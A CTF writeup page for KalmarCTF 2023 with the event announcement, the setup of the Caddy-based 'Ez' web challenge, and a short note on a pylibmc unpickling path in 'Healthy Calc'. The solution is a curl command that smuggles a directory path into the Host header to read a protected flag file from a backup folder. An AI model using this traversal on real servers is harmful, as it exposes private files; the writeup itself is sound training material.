
CTF scripts and writeups (mostly challenge + .py solving script)

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KalmarCTF 2023

Welcome to KalmarCTF 2023, brought to you by the Kalmarunionen The competition will take place on Fri, 03 Mar. 2023, 17:00 UTC to Sun, 05 Mar. 2023, 17:00 UTC. For more information and to register, visit our website at KalmarC.TF We are thrilled to announce that Hex-Rays will be the main sponsor of KalmarCTF 2023. This year’s competition will feature a variety of categories including pwn, crypto, web, rev, and of course miscgang will deliver. Don’t miss out on the opportunity to test your skills and compete against the best in the field. Register now at KalmarC.TF and we’ll see you at KalmarCTF 2023! Now with discord: https://discord.gg/kalmarctf



Challenge: Ez ⛳

Heard ‘bout that new 🏌️-webserver? Apparently HTTPS just works(!), but seems like someone managed to screw up the setup, woops. The flag.txt is deleted until I figure out that HTTPS and PHP stuff #hacker-proof

Challenge setup:

caddy:2.4.5-alpine – this was the newest version of caddy when making this challenge.

File structure:

├── Caddyfile
├── php.caddy.chal-kalmarc.tf
│   ├── flag.txt
│   └── index.php
├── static.caddy.chal-kalmarc.tf
│   └── logo_round.svg
└── www.caddy.chal-kalmarc.tf
    └── index.html

docker-compose will create a wildcard cert, create a backup of all *.caddy.chal-kalmarc.tf folders into backup/ and finally delete flag.txt.

apk add --update openssl nss-tools     && \
rm -rf /var/cache/apk/                 && \
openssl req -x509 -batch -newkey rsa:2048 -nodes -keyout /etc/ssl/private/caddy.key -days 365 -out /etc/ssl/certs/caddy.pem -subj '/C=DK/O=Kalmarunionen/CN=*.caddy.chal-kalmarc.tf' && \
mkdir -p backups/                      && \
cp -r *.caddy.chal-kalmarc.tf backups/ && \
rm php.caddy.chal-kalmarc.tf/flag.txt  && \
sleep 1                                && \
caddy run

So the running system has this folder structure:

├── Caddyfile
├── backups
│   ├── php.caddy.chal-kalmarc.tf
│   │   ├── flag.txt
│   │   └── index.php
│   ├── static.caddy.chal-kalmarc.tf
│   │   └── logo_round.svg
│   └── www.caddy.chal-kalmarc.tf
│       └── index.html
├── php.caddy.chal-kalmarc.tf
│   └── index.php
├── static.caddy.chal-kalmarc.tf
│   └── logo_round.svg
└── www.caddy.chal-kalmarc.tf
    └── index.html

The important part of the Caddyfile is:

*.caddy.chal-kalmarc.tf {
    # block accidental exposure of flags:
    respond /flag.txt 403

    file_server {
        root /srv/{host}/

Solution: curl -k --path-as-is http://php.caddy.kalmarc.tf//flag.txt -H 'Host: backups/php.caddy.kalmarc.tf'

Challenge: Healthy Calc


Flow is: _PylibMC_Unpickle_Bytes calls _PylibMC_Unpickle_Bytes calls PyObject_CallFunctionObjArgs(_PylibMC_pickle_loads, val, NULL)